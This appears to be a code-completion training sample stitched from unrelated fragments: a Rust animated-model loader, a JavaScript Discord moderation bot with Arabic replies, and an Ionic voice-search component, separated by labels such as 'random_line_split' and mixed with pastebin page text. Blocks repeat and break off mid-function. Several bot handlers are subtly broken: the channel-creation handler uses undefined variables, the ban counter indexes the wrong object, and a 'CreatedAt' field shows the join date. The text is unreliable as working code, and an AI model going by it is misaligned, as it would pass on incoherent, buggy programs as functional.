let ind_buf = graphics.device.create_buffer_static(indices.as_slice());
let mut buf_slices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
for ind in start_indices.windows(2) {
buf_slices.push(gfx::Slice {
start: ind[0],
end: ind[1],
prim_type: gfx::TriangleList,
// prim_type: gfx::LineStrip,
kind: gfx::SliceKind::Index32(ind_buf, 0 as u32),
});
}
for (slice, mesh) in buf_slices.iter()
.zip(ai_scene.get_meshes().iter()) {
let shader_data = ShaderParam {
u_model_view_proj: vecmath::mat4_id(),
t_color: (*materials[mesh.material_index as uint], None),
u_bone_transformations: u_bone_transformations.raw(),
};
batches.push(ModelComponent {
batch: graphics.make_batch(program,
&vert_buf,
*slice,
state).unwrap(),
shader_data: shader_data,
});
}
}
Model {
vertices: vertices,
indices: indices,
batches: batches,
bone_map: RefCell::new(bone_map),
bone_transform_buffer: u_bone_transformations,
global_inverse: ai_scene.get_root_node().transformation.inverse(),
scene: ai_scene,
}
}
fn interpolate_position(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_position_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for pos_keys in keys.windows(2) {
// note: once we find a match, we return
if time < pos_keys[1].time {
let dt = pos_keys[1].time - pos_keys[0].time;
// how far inbetween the frams we are on a scale from 0 to 1
let s = (time - pos_keys[0].time) / dt;
return lerp(pos_keys[0].value,
pos_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_scaling(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_scaling_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for scale_keys in keys.windows(2) {
// note: once we find a match, we return
if time < scale_keys[1].time {
let dt = scale_keys[1].time - scale_keys[0].time;
// how far inbetween the frams we are on a scale from 0 to 1
let s = (time - scale_keys[0].time) / dt;
return lerp(scale_keys[0].value,
scale_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_rotation(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Quaternion {
let keys = node.get_rotation_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for rot_keys in keys.windows(2) {
// note: once we find a match, we return
if time < rot_keys[1].time {
| // Create the buffer for the bone transformations. We fill this
// up each time we draw, so no need to do it here.
let u_bone_transformations: gfx::BufferHandle<Mat4> =
graphics.device.create_buffer(MAX_BONES, gfx::BufferUsage::Dynamic);
| random_line_split |
main.rs | <'a> {
pub vertices: Vec<Vertex>,
pub indices: Vec<u32>,
pub batches: Vec<ModelComponent>,
pub scene: ai::Scene<'a>,
pub bone_map: RefCell<BoneMap>,
pub global_inverse: ai::Matrix4x4,
pub bone_transform_buffer: gfx::BufferHandle<Mat4>,
}
#[inline(always)]
fn lerp<S, T: Add<T,T> + Sub<T,T> + Mul<S,T>>(start: T, end: T, s: S) -> T {
return start + (end - start) * s;
}
impl<'a> Model<'a> {
fn from_file(ai_scene: ai::Scene<'a>,
graphics: &mut gfx::Graphics<gfx::GlDevice, gfx::GlCommandBuffer>,
program: &gfx::ProgramHandle,
state: &gfx::DrawState,
texture_store: &TextureStore,
) -> Model<'a> {
// calculate the space we need to allocate
let mut num_vertices = 0;
let mut num_indices = 0;
for mesh in ai_scene.get_meshes().iter() {
num_vertices += mesh.num_vertices;
num_indices += mesh.num_faces * 3;
}
// prepare the data structures used to store the scene
let mut vertices = Vec::with_capacity(num_vertices as uint);
let mut indices = Vec::with_capacity(num_indices as uint);
// The bone weights and ids. Each vertex may be influenced by upto
// 4 bones
let mut bone_weights: Vec<Vec4> = Vec::from_elem(num_vertices as uint,
[0.0, ..4]);
let mut bone_ids: Vec<IVec4> = Vec::from_elem(num_vertices as uint,
[0, ..4]);
let bone_map = BoneMap::new(&ai_scene);
// stores the first index of each mesh, used for creating batches
let mut start_indices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
let mut materials = Vec::with_capacity(ai_scene.num_materials as uint);
let mut batches = Vec::with_capacity(ai_scene.num_meshes as uint);
// Create the buffer for the bone transformations. We fill this
// up each time we draw, so no need to do it here.
let u_bone_transformations: gfx::BufferHandle<Mat4> =
graphics.device.create_buffer(MAX_BONES, gfx::BufferUsage::Dynamic);
// find the textures used by this model from the list of materials
for mat in ai_scene.get_materials().iter() {
let texture_src = mat.get_texture(ai::material::TextureType::Diffuse,
0
);
match texture_src {
Some(s) => {
match texture_store.textures.get(&s) {
Some(t) => materials.push(t),
None => panic!("couldn't load texture: {}", s),
}
}
None => {
panic!("could read texture name from material: {}", texture_src);
}
}
}
// prepare the data for a format that can be loaded to the gpu
{
start_indices.push(0);
for mesh in ai_scene.get_meshes().iter() {
let vert_id_offset = vertices.len() as u32;
// get all the bone information for this mesh
for bone in mesh.get_bones().iter() {
let bone_id = bone_map.get_id(&bone.name.to_string());
// println!("{}: Bone id and name: {} ===> {}",
// mesh_num, bone_id, bone.name);
let bone_id = match bone_id {
None => panic!("Invaild bone reference"),
Some(id) => id,
};
'next_weight: for vert_weight in bone.get_weights().iter() {
let vertex_id = (vert_id_offset + vert_weight.vertex_id) as uint;
for i in range(0u, 4) {
if bone_ids[vertex_id][i] == 0 {
bone_weights[vertex_id][i] = vert_weight.weight;
bone_ids[vertex_id][i] = bone_id;
continue 'next_weight;
}
}
// assimp should have limited bone weights to 4
unreachable!();
}
}
let verts = mesh.get_vertices();
let norms = mesh.get_normals();
let tex_coords = mesh.get_texture_coords();
// fill up the vertex buffer
for i in range(0u, verts.len()) {
vertices.push( Vertex {
a_position: verts[i].to_array(),
a_normal: norms[i].to_array(),
a_tex_coord: if tex_coords.len() == 0 {
[0.0, 0.0, 0.0]
} else {
// only support 1 texture coord
tex_coords[0][i].to_array()
},
a_bone_weights: bone_weights[i + vert_id_offset as uint],
a_bone_ids: bone_ids[i + vert_id_offset as uint],
});
}
// fill up the index buffer
for face in mesh.get_faces().iter() {
let face_indices = face.get_indices();
assert!(face_indices.len() == 3);
indices.push(face_indices[0] + vert_id_offset);
indices.push(face_indices[1] + vert_id_offset);
indices.push(face_indices[2] + vert_id_offset);
}
start_indices.push(indices.len() as u32);
}
}
// create the vertex and index buffers
// generate the batches used to draw the object
{
let vert_buf = graphics.device.create_mesh(vertices.as_slice());
let ind_buf = graphics.device.create_buffer_static(indices.as_slice());
let mut buf_slices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
for ind in start_indices.windows(2) {
buf_slices.push(gfx::Slice {
start: ind[0],
end: ind[1],
prim_type: gfx::TriangleList,
// prim_type: gfx::LineStrip,
kind: gfx::SliceKind::Index32(ind_buf, 0 as u32),
});
}
for (slice, mesh) in buf_slices.iter()
.zip(ai_scene.get_meshes().iter()) {
let shader_data = ShaderParam {
u_model_view_proj: vecmath::mat4_id(),
t_color: (*materials[mesh.material_index as uint], None),
u_bone_transformations: u_bone_transformations.raw(),
};
batches.push(ModelComponent {
batch: graphics.make_batch(program,
&vert_buf,
*slice,
state).unwrap(),
shader_data: shader_data,
});
}
}
Model {
vertices: vertices,
indices: indices,
batches: batches,
bone_map: RefCell::new(bone_map),
bone_transform_buffer: u_bone_transformations,
global_inverse: ai_scene.get_root_node().transformation.inverse(),
scene: ai_scene,
}
}
fn interpolate_position(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_position_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for pos_keys in keys.windows(2) {
// note: once we find a match, we return
if time < pos_keys[1].time {
let dt = pos_keys[1].time - pos_keys[0].time;
// how far inbetween the frams we are on a scale from 0 to 1
let s = (time - pos_keys[0].time) / dt;
return lerp(pos_keys[0].value,
pos_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_scaling(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_scaling_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for scale_keys in keys.windows(2) {
// note: once we find a match, we return
if time < scale_keys[1].time {
let dt = scale_keys[1].time - scale_keys[0].time;
// how far inbetween the frams we are on a scale from 0 to 1
let s = (time - scale_keys[0].time) / dt;
return lerp(scale_keys[0].value,
scale_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_rotation(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Quaternion {
let keys = node.get_rotation_keys();
// only one key, so no need to interpolate
| Model | identifier_name |
|
bot.js | ].bans = 0;
},Otime)
} catch (error) {
console.log(error)
}
}
}
})
});
let channelc = {};
client.on('channelCreate', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelcreate = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was Created By ${channelcreate.tag}`);
if(!channelc[channelcreate.id]) {
channelc[channelcreate.id] = {
created : 0
}
}
channelc[channelcreate.id].created += 3;
if(channelc[channelcreate.id].created >= Onumber ) {
let roles = guild.members.get(banner).roles.array();
guild.members.get(banner).removeRoles(roles);
rebellog.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر @everyone`);
channel.guild.owner.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر ${channel.guild.name}`)
}
setTimeout(() => {
channelc[channelcreate.id].created = 0;
},Otime)
});
let channelr = {};
client.on('channelDelete', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelremover = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was deleted By ${channelremover.tag}`);
if(!channelr[channelremover.id]) {
channelr[channelremover.id] = {
deleted : 0
}
}
client.on('message', message => {
var prefix = "$";
if (message.author.id === client.user.id) return;
if (message.guild) {
let embed = new Discord.RichEmbed()
let args = message.content.split(' ').slice(1).join(' ');
if(message.content.split(' ')[0] == prefix + 'bc') {
if (!args[1]) {
message.channel.send("**اكتب شي بعد الكوماند**");
return;
}
message.guild.members.forEach(m => {
if(!message.member.hasPermission('ADMINISTRATOR')) return;
var bc = new Discord.RichEmbed()
.addField('» السيرفر :', `${message.guild.name}`)
.addField('» المرسل : ', `${message.author.username}#${message.author.discriminator}`)
.addField(' » الرسالة : ', args)
.setColor('#ff0000')
// m.send(`[${m}]`);
m.send(`${m}`,{embed: bc});
});
}
} else {
return;
}
});
client.on('guildMemberAdd', member => {
member.guild.fetchInvites().then(guildInvites => {
const ei = invites[member.guild.id];
const invite = guildInvites.find(i => ei.get(i.code).uses < i.uses);
const inviter = client.users.get(invite.inviter.id);
const channel = member.guild.channels.find("name", "✽-welcome");
channel.send(`<@${member.user.id}> ** joined; ** Invited by ** <@${inviter.id}> ** `);
});
});
1.36 KB
client.on('message', message => {
var prefix = "$"
if (message.content.startsWith(prefix + 'id')) {
if (message.author.bot) return
if (!message.guild) return message.reply('**This Command Just In Servers**')
message.guild.fetchInvites().then(invs => {
let personalInvites = invs.filter(i => i.inviter.id === message.author.id)
let inviteCount = personalInvites.reduce((p, v) => v.uses + p, 0)
var roles = message.member.roles.map(roles => `**__${roles.name}__ |**`).join(` `)
let id = new Discord.RichEmbed()
.setColor('RANDOM')
.setTitle(':clipboard: | User identity info')
.setAuthor(message.author.username,message.author.avatarURL)
.addField('• Name :', message.author.username,true)
.addField('• Tag :', message.author.discriminator,true)
.addField('• ID :', message.author.id,true)
.addField('• JoinedAt :', moment(message.joinedAt).format('D/M/YYYY h:mm a '),true)
.addField('• CreatedAt :', moment(message.joinedAt).format('D/M/YYYY h:mm a '),true)
.addField('• Total invites :', inviteCount,true)
.addField('• Roles :', roles)
.setTimestamp()
message.channel.sendEmbed(id).then(c => {
c.react('📋')
})
})
}
});
var prefix = "$"
client.on("message", (message) => {
if (message.content.startsWith("${prefix}kick")) {
if(!message.member.hasPermission('KICK_MEMBERS')) return message.reply('? ماعندك الصلاحيات');
var member= message.mentions.members.first();
member.kick().then((member) => {
message.channel.send(member.displayName + " مع السلامه :wave: ");
}).catch(() => {
message.channel.send("Error -_-");
});
}
});
var prefix = "$"
client.on('message', message => {
if (message.author.xErenaa) return;
if (!message.content.startsWith(prefix)) return;
let command = message.content.split(" ")[0];
command = command.slice(prefix.length);
let args = message.content.split(" ").slice(1);
if (command == "ban") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.guild.member(message.author).hasPermission("BAN_MEMBERS")) return message.reply("**You Don't Have ` BAN_MEMBERS ` Permission**");
if(!message.guild.member(client.user).hasPermission("BAN_MEMBERS")) return message.reply("**I Don't Have ` BAN_MEMBERS ` Permission**");
let user = message.mentions.users.first();
let reason = message.content.split(" ").slice(2).join(" ");
/*let bErenaalog = client.channels.find("name", "Erenaa-log");
if(!bErenaalog) return message.reply("I've detected that this server doesn't have a Erenaa-log text channel.");*/
if (message.mentions.users.size < 1) return message.reply("**منشن شخص**");
if(!reason) return message.reply ("**اكتب سبب الطرد**");
if (!message.guild.member(user)
.bannable) return message.reply("**لايمكنني طرد شخص اعلى من رتبتي يرجه اعطاء البوت رتبه عالي**");
message.guild.member(user).ban(7, user);
const banembed = new Discord.RichEmbed()
.setAuthor(`BANNED!`, user.displayAvatarURL)
.setColor("RANDOM")
.setTimestamp()
.addField("**User:**", '**[ ' + `${user.tag}` + ' ]**')
.addField("**By:**", '**[ ' + `${message.author.tag}` + ' ]**')
.addField("**Reason:**", '**[ ' + `${reason}` + ' ]**')
message.channel.send({
embed : banembed
})
}
});
client.on('message', message => {
if(!message.channel.guild) return;
if(message.content.startsWith(prefix + 'move')) {
if (message.member.hasPermission("MOVE_MEMBERS")) {
if (message.mentions.users.size === 0) {
return message.channel.send("``لاستخدام الأمر اكتب هذه الأمر : " +prefix+ "move [USER]``")
}
if (message.member.voiceChannel != null) {
if (message.mentions.members.first().voiceChannel != null) {
var authorchannel = message.member.voiceChannelID;
var usermentioned = message.mentions.members.first().id;
var embed = new Discord.RichEmbed()
.setTitle("Succes!")
.setColor("#000000")
.setDescription(`لقد قمت بسحب <@${usermentioned}> الى الروم الصوتي الخاص بك✅ `)
var embed = new Discord.RichEmbed()
.setTitle(`You are Moved in ${message.guild.name}`)
.setColor("RANDOM")
.setDescription(`**<@${message.author.id}> Moved You To His Channel!\nServer --> ${message.guild.name}**`)
message.guild.members.get(usermentioned).setVoiceChannel(authorchannel).then(m => message.channel.send(embed))
message.guild.members.get(usermentioned).send(embed)
} else {
message.channel.send("``لا تستطيع سحب "+ message.mentions.members.first() +" `يجب ان يكون هذه العضو في روم صوتي`")
}
} else {
message.channel.send("**``يجب ان تكون في روم صوتي لكي تقوم بسحب العضو أليك``**")
}
} else {
message.react("❌")
}}}) | ;
Save New Duplicate & Edit Just Text Twitter
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15 | conditional_block |
|
bot.js | .addField('**__ Voice Channels | رومات صوتيه__**',`[** __${msg.guild.channels.filter(m => m.type === 'voice').size}__ **]`,true)
.addField('**__ Created At | صنع في __**',msg.guild.createdAt.toLocaleString())
msg.channel.send({embed:embed});
}
});
client.on('message', message => {
var prefix = "$";
if(message.content === prefix + "cc") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.member.hasPermission('MANAGE_MESSAGES')) return message.reply(' **تم قفل الشات*');
message.channel.overwritePermissions(message.guild.id, {
SEND_MESSAGES: false
}).then(() => {
message.reply("**تم قفل الشات :white_check_mark: **")
});
}
//FIRE BOT
if(message.content === prefix + "oc") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.member.hasPermission('MANAGE_MESSAGES')) return message.reply('**تم فتح الشات**');
message.channel.overwritePermissions(message.guild.id, {
SEND_MESSAGES: true
}).then(() => {
message.reply("**تم فتح الشات :white_check_mark:**")
});
}
client.on('message', msg => {
if (msg.author.bot) return;
if (!msg.content.startsWith(prefix)) return;
let command = msg.content.split(" ")[0];
command = command.slice(prefix.length);
let args = msg.content.split(" ").slice(1);
if(command === "clear") {
const emoji = client.emojis.find("name", "wastebasket")
let textxt = args.slice(0).join("");
if(msg.member.hasPermission("MANAGE_MESSAGES")) {
if (textxt == "") {
msg.delete().then
msg.channel.send("***```Supply A Number ًں‘Œ```***").then(m => m.delete(3000));
} else {
msg.delete().then
msg.delete().then
msg.channel.bulkDelete(textxt);
msg.channel.send("```Cleard: " + textxt + "\n Messages```").then(m => m.delete(3000));
}
}
}
});
client.on('message', message => {
if (message.content === "$bot") {
var year = message.guild.createdAt.getFullYear()
var month = message.guild.createdAt.getMonth()
var day = message.guild.createdAt.getDate()
let embed = new Discord.RichEmbed()
.addField('**Bot Servers**',`[ ${client.guilds.size} ]`)
.addField('**Users**',`[ ${client.users.size} ]`)
.addField('**Channels**',`[ ${client.channels.size} ]`)
.addField('**ID**',`[ ${client.user.id} ]`)
.addField('**Name**',`[ ${client.user.tag} ]`)
.addField('Requested by:', "<@" + message.author.id + ">")
.setColor("#51cde6")
.setDescription(`${message.guild.name}`)
message.channel.sendEmbed(embed);
}
});;
client.on('message', message => {
if(message.content.includes('discord.gg')){
if(!message.channel.guild) return message.reply('** advertising me on DM ? **');
if (!message.member.hasPermissions(['ADMINISTRATOR'])){
message.delete()
return message.reply(`** No Invite Links !**`)
}
}
});
var AsciiTable = require('ascii-data-table').default
client.on('message', message =>{
if(message.content == "#roles"){
if(message.guild.member(message.author).hasPermission("ADMINISTRATOR"))
var
ros=message.guild.roles.size,
data = [['Rank', 'RoleName']]
for(let i =0;i<ros;i++){
if(message.guild.roles.array()[i].id !== message.guild.id){
data.push([i,`${message.guild.roles.filter(r => r.position == ros-i).map(r=>r.name)}`])
}}
let res = AsciiTable.table(data)
message.channel.send(`**\`\`\`xl\n${res}\`\`\`**`);
}
}); |
var guilds = {};
client.on('guildBanAdd', function(guild) {
const rebellog = client.channels.find("name", "log"),
Onumber = 10,
Otime = 10000
guild.fetchAuditLogs({
type: 22
}).then(audit => {
let banner = audit.entries.map(banner => banner.executor.id)
let bans = guilds[guild.id + banner].bans || 0
guilds[guild.id + banner] = {
bans: 0
}
bans[guilds.id].bans += 3;
if(guilds[guild.id + banner].bans >= Onumber) {
try {
let roles = guild.members.get(banner).roles.array();
guild.members.get(banner).removeRoles(roles);
} catch (error) {
console.log(error)
try {
guild.members.get(banner).removeRoles(roles);
rebellog.send(`<@!${banner.id}>
حآول العبث بالسيرفر @everyone`);
guild.owner.send(`<@!${banner.id}>
حآول العبث بالسيرفر ${guild.name}`)
setTimeout(() => {
guilds[guild.id].bans = 0;
},Otime)
} catch (error) {
console.log(error)
}
}
}
})
});
let channelc = {};
client.on('channelCreate', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelcreate = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was Created By ${channelcreate.tag}`);
if(!channelc[channelcreate.id]) {
channelc[channelcreate.id] = {
created : 0
}
}
channelc[channelcreate.id].created += 3;
if(channelc[channelcreate.id].created >= Onumber ) {
let roles = guild.members.get(banner).roles.array();
guild.members.get(banner).removeRoles(roles);
rebellog.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر @everyone`);
channel.guild.owner.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر ${channel.guild.name}`)
}
setTimeout(() => {
channelc[channelcreate.id].created = 0;
},Otime)
});
let channelr = {};
client.on('channelDelete', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelremover = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was deleted By ${channelremover.tag}`);
if(!channelr[channelremover.id]) {
channelr[channelremover.id] = {
deleted : 0
}
}
client.on('message', message => {
var prefix = "$";
if (message.author.id === client.user.id) return;
if (message.guild) {
let embed = new Discord.RichEmbed()
let args = message.content.split(' ').slice(1).join(' ');
if(message.content.split(' ')[0] == prefix + 'bc') {
if (!args[1]) {
message.channel.send("**اكتب شي بعد الكوماند**");
return;
}
message.guild.members.forEach(m => {
if(!message.member.hasPermission('ADMINISTRATOR')) return;
var bc = new Discord.RichEmbed()
.addField('» السيرفر :', `${message.guild.name}`)
.addField('» المرسل : ', `${message.author.username}#${message.author.discriminator}`)
.addField(' » الرسالة : ', args)
.setColor('#ff0000')
// m.send(`[${m}]`);
m.send(`${m}`,{embed: bc});
});
}
} else {
return;
}
});
client.on('guildMemberAdd', member => {
member.guild.fetchInvites().then(guildInvites => {
const ei = invites[member.guild.id];
const invite = guildInvites.find(i => ei.get(i.code).uses < i.uses);
const inviter = client.users.get(invite.inviter.id);
const channel = member.guild.channels.find("name", "✽-welcome");
channel.send(`<@${member.user.id}> ** joined; ** Invited by ** <@${inviter.id}> ** `);
});
});
1.36 KB
client.on('message', message => {
var prefix = "$"
if (message.content.startsWith(prefix + 'id')) {
if (message.author.bot) return
if (!message.guild) return message.reply('**This Command Just In Servers**')
message.guild.fetchInvites().then(invs => {
let personalInvites = invs.filter(i => i.inviter.id === message.author.id)
let inviteCount = personalInvites.reduce((p, v) => v.uses + p, 0)
var roles = message.member.roles.map(roles => | random_line_split |
|
menus.component.ts | );
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) {
this.iab.create( url, '_system' );
}
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask User permission to acces Mic
// *********************************************************
ask | {
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show toast when user need to talk
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
} // Create a <li> node
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show resukt of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************∏
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
var CityName = "";
this.storage.get("language").then((language) => {
this.CityName = language;
//console.log(language);
let num = language
let stringForm = num.toString();
//console.log(stringForm);
console.log(CityName)
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// function get | Permission()
| identifier_name |
menus.component.ts | );
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) {
this.iab.create( url, '_system' );
}
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask User permission to acces Mic
// *********************************************************
askPermission()
{
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
| else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show toast when user need to talk
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
